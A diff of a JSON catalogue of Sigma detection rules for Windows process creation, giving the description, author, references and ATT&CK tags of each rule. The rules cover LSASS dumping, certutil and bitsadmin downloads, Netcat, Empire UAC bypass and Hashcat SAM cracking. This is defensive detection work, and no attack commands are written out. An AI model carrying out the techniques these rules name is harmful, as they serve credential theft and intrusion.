+ "filename": "proc_creation_win_invoke_obfuscation_clip.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/issues/1009",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027",
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "b222df08-0e07-11eb-adc1-0242ac120002",
+ "value": "Invoke-Obfuscation CLIP+ Launcher"
+ },
+ {
+ "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/26",
+ "falsepositive": [
+ "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates"
+ ],
+ "filename": "proc_creation_win_susp_taskkill.yml",
 "level": "low",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://car.mitre.org/wiki/CAR-2013-04-002",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml"
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1489"
+ ]
+ },
+ "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d",
+ "value": "Suspicious Execution of Taskkill"
+ },
+ {
+ "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/01/21",
+ "falsepositive": [
+ "Legitimate deinstallation by administrative staff"
+ ],
+ "filename": "proc_creation_win_susp_disable_raccine.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/Neo23x0/Raccine",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc",
+ "value": "Raccine Uninstall"
+ },
+ {
+ "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/08/18",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_handlekatz.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/codewhitesec/HandleKatz",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ]
+ },
+ "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c",
+ "value": "HandleKatz LSASS Dumper Usage"
+ },
+ {
+ "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code",
+ "meta": {
+ "author": "Florian Roth, juju4, keepwatch",
+ "creation_date": "2019/01/16",
+ "falsepositive": [
+ "False positives depend on scripts and administrative tools used in the monitored environment"
+ ],
+ "filename": "proc_creation_win_susp_certutil_command.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ 
"logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
+ "https://twitter.com/JohnLaTwC/status/835149808817991680",
+ "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/",
+ "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/",
+ "https://twitter.com/egre55/status/1087685529016193025",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1140",
+ "attack.command_and_control",
+ "attack.t1105",
+ "attack.s0160",
+ "attack.g0007",
+ "attack.g0010",
+ "attack.g0045",
+ "attack.g0049",
+ "attack.g0075",
+ "attack.g0096"
+ ]
+ },
+ "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a",
+ "value": "Suspicious Certutil Command Usage"
+ },
+ {
+ "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.",
+ "meta": {
+ "author": "Endgame, JHasenbusch (ported for oscd.community)",
+ "creation_date": "2018/10/30",
+ "falsepositive": [
+ "Legitimate use of net.exe utility by legitimate user"
+ ],
+ "filename": "proc_creation_win_net_enum.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1018"
+ ]
+ },
+ "uuid": "62510e69-616b-4078-b371-847da438cc03",
+ "value": "Windows Network Enumeration"
+ },
+ {
+ "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)",
+ "meta": {
+ "author": "Florian Roth (rule), David ANDRE 
(additional keywords)",
+ "creation_date": "2021/12/20",
+ "falsepositive": [
+ "Administrative activity",
+ "Scripts and administrative tools used in the monitored environment",
+ "Monitoring activity"
+ ],
+ "filename": "proc_creation_win_susp_system_user_anomaly.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://tools.thehacker.recipes/mimikatz/modules",
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09",
+ "value": "Suspicious SYSTEM User Process Creation"
+ },
+ {
+ "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes",
+ "meta": {
+ "author": "X__Junior, Florian Roth",
+ "creation_date": "2022/12/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_rar_susp_greedy.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://decoded.avast.io/martinchlumecky/png-steganography",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_susp_greedy.yml"
 ],
 "tags": [
- "car.2013-04-002",
 "attack.execution",
 "attack.t1059"
 ]
 },
- "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1",
- "value": "Quick Execution of a Series of Suspicious Commands"
+ "uuid": "afe52666-401e-4a02-b4ff-5d128990b8cb",
+ "value": "RAR Greedy Compression"
 },
 {
- "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network",
+ "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type",
+ "meta": {
+ "author": "Nasreddine 
Bencherchali",
+ "creation_date": "2022/08/31",
+ "falsepositive": [
+ "Some installers were seen using this method of creation unfortunately. Filter them in your environment"
+ ],
+ "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1053.005"
+ ]
+ },
+ "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a",
+ "value": "Suspicious Schtasks Schedule Type With High Privileges"
+ },
+ {
+ "description": "Detects new commands that add new printer port which point to suspicious file",
+ "meta": {
+ "author": "EagleEye Team, Florian Roth",
+ "creation_date": "2020/05/13",
+ "falsepositive": [
+ "New printer port install on host"
+ ],
+ "filename": "proc_creation_win_exploit_cve_2020_1048.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://windows-internals.com/printdemon-cve-2020-1048/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7",
+ "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)"
+ },
+ {
+ "description": "Detect the use of Windows Defender to download payloads",
+ "meta": {
+ "author": "Matthew Matchen",
+ "creation_date": "2020/09/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml",
+ "level": "high",
+ 
"logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/",
+ "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218",
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
+ },
+ "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5",
+ "value": "Windows Defender Download Activity"
+ },
+ {
+ "description": "Detects some Empire PowerShell UAC bypass methods",
+ "meta": {
+ "author": "Ecco",
+ "creation_date": "2019/08/30",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1548.002",
+ "car.2019-04-001"
+ ]
+ },
+ "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787",
+ "value": "Empire PowerShell UAC Bypass"
+ },
+ {
+ "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/12",
+ "falsepositive": [
+ "Legitimate admin scripts"
+ ],
+ "filename": "proc_creation_win_cmd_redirection_susp_folder.yml",
+ "level": "medium",
+ 
"logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892",
+ "value": "Suspicious CMD Shell Redirect"
+ },
+ {
+ "description": "Detects usage of bitsadmin downloading a file to uncommon target folder",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1197",
+ "attack.s0190",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248",
+ "value": "Bitsadmin Download to Uncommon Target Folder"
+ },
+ {
+ "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. 
This is often used after a privilege escalation attempt.",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/05/05",
+ "falsepositive": [
+ "Administrative activity (rare lookups on current privileges)"
+ ],
+ "filename": "proc_creation_win_whoami_priv.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.discovery",
+ "attack.t1033"
+ ]
+ },
+ "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b",
+ "value": "Run Whoami Showing Privileges"
+ },
+ {
+ "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems",
+ "meta": {
+ "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'",
+ "creation_date": "2021/12/07",
+ "falsepositive": [
+ "Administrator, hotline ask to user"
+ ],
+ "filename": "proc_creation_win_susp_network_command.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1016"
+ ]
+ },
+ "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae",
+ "value": "Suspicious Network Command"
+ },
+ {
+ "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2018/09/03",
+ 
"falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_apt_emissarypanda_sep19.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/cyb3rops/status/1168863899531132929",
+ "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1574.002"
+ ]
+ },
+ "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014",
+ "value": "Emissary Panda Malware SLLauncher"
+ },
+ {
+ "description": "Detects requests to disable Microsoft Defender features using PowerShell commands",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/03/03",
+ "falsepositive": [
+ "Possible Admin Activity",
+ "Other Cmdlets that may use the same parameters"
+ ],
+ "filename": "proc_creation_win_powershell_defender_disable_feature.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files",
+ "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE",
+ "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "1ec65a5f-9473-4f12-97da-622044d6df21",
+ "value": "Powershell Defender Disable Scan Feature"
+ },
+ {
+ "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/01",
+ "falsepositive": 
[
+ "Legitimate use when App-v is deployed"
+ ],
+ "filename": "proc_creation_win_lolbin_scriptrunner.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420",
+ "value": "Use of Scriptrunner.exe"
+ },
+ {
+ "description": "Detects usage of cmdkey to look for cached credentials",
+ "meta": {
+ "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)",
+ "creation_date": "2019/01/16",
+ "falsepositive": [
+ "Legitimate administrative tasks"
+ ],
+ "filename": "proc_creation_win_cmdkey_recon.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx",
+ "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.005"
+ ]
+ },
+ "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53",
+ "value": "Cmdkey Cached Credentials Recon"
+ },
+ {
+ "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ 
"https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.t1197",
+ "attack.s0190",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac",
+ "value": "Bitsadmin Download to Suspicious Target Folder"
+ },
+ {
+ "description": "Detects when a user downloads file by using CertOC.exe",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/05/16",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_lolbin_certoc_download.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Certoc/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
+ },
+ "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d",
+ "value": "Suspicious File Download via CertOC.exe"
+ },
+ {
+ "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/07/24",
+ "falsepositive": [
+ "Legitimate files with these rare hacktool names"
+ ],
+ "filename": "proc_creation_win_tools_relay_attacks.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes",
+ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
+ "https://attack.mitre.org/techniques/T1557/001/",
+ 
"https://github.com/ohpe/juicy-potato",
+ "https://pentestlab.blog/2017/04/13/hot-potato/",
+ "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1557.001"
+ ]
+ },
+ "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1",
+ "value": "SMB Relay Attack Tools"
+ },
+ {
+ "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group",
+ "meta": {
+ "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)",
+ "creation_date": "2019/03/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_apt_slingshot.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://securelist.com/apt-slingshot/84312/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1053.005",
+ "attack.s0111"
+ ]
+ },
+ "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0",
+ "value": "Defrag Deactivation"
+ },
+ {
+ "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network",
 "meta": {
 "author": "frack113, Florian Roth",
 "creation_date": "2021/07/21",
@@ -42934,6 +35701,7 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.revshells.com/",
 "https://nmap.org/ncat/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml"
@@ -42944,81 +35712,317 @@
 ]
 },
 "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08",
- "value": "Ncat Execution"
+ "value": "Netcat Suspicious Execution"
 },
 {
- "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware",
+ "description": "Detects the use of SDelete to erase a file not the free space",
 "meta": {
- "author": "Sander Wiebing",
- "creation_date": "2020/05/23",
+ "author": "frack113",
+ "creation_date": "2021/06/03",
 "falsepositive": [
- "Legitimate administration"
+ "System administrator usage"
 ],
- "filename": "proc_creation_win_netsh_allow_port_rdp.yml",
+ "filename": "proc_creation_win_sdelete.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml"
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1485"
+ ]
+ },
+ "uuid": "a4824fca-976f-4964-b334-0621379e84c4",
+ "value": "Sysinternals SDelete Delete File"
+ },
+ {
+ "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.",
+ "meta": {
+ "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community",
+ "creation_date": "2019/03/22",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_etw_trace_evasion.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil",
+ "https://abuse.io/lockergoga.txt",
+ "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml"
 ],
 "tags": [
 "attack.defense_evasion",
- "attack.t1562.004"
+ "attack.t1070",
+ "attack.t1562.006",
+ "car.2016-04-002"
 ]
 },
- "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62",
- "value": "Netsh RDP Port Opening"
+ "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6",
+ "value": "Disable of ETW Trace"
 },
 {
- "description": "Allow Incoming Connections by Port or Application on Windows Firewall",
+ "description": "Detects suspicious powershell command line parameters used in Empire",
 "meta": {
- "author": "Markus Neis, Sander Wiebing",
- "creation_date": "2019/01/29",
+ "author": "Florian Roth",
+ "creation_date": "2019/04/20",
 "falsepositive": [
- "Legitimate administration"
+ "Other tools that incidentally use the same command line parameters"
 ],
- "filename": "proc_creation_win_netsh_fw_add.yml",
+ "filename": "proc_creation_win_susp_powershell_empire_launch.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581",
+ "value": "Empire PowerShell Launch Parameters"
+ },
+ {
+ "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/27",
+ "falsepositive": [
+ "Tools that accidentally use the same command line flags and values"
+ ],
+ "filename": "proc_creation_win_hashcat.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://hashcat.net/wiki/doku.php?id=hashcat",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1110.002"
+ ]
+ },
+ "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf",
+ "value": "Password Cracking with Hashcat"
+ },
+ {
+ "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.",
+ "meta": {
+ "author": "Nasreddine Bencherchali @nas_bench",
+ "creation_date": "2021/12/18",
+ "falsepositive": [
+ "Another tool that uses the command line switches of PsLogList",
+ "Legitimate use of PsLogList by an administrator"
+ ],
+ "filename": "proc_creation_win_susp_psloglist.yml",
 "level": "medium",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)",
- "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml"
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
+ "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1087",
+ "attack.t1087.001",
+ "attack.t1087.002"
+ ]
+ },
+ "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc",
+ "value": "Suspicious Use of PsLogList"
+ },
+ {
+ "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection",
+ "meta": {
+ "author": "frack113, Nasreddine Bencherchali",
+ "creation_date": "2022/08/07",
+ "falsepositive": [
+ "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process."
+ ],
+ "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml",
+ "level": "medium",
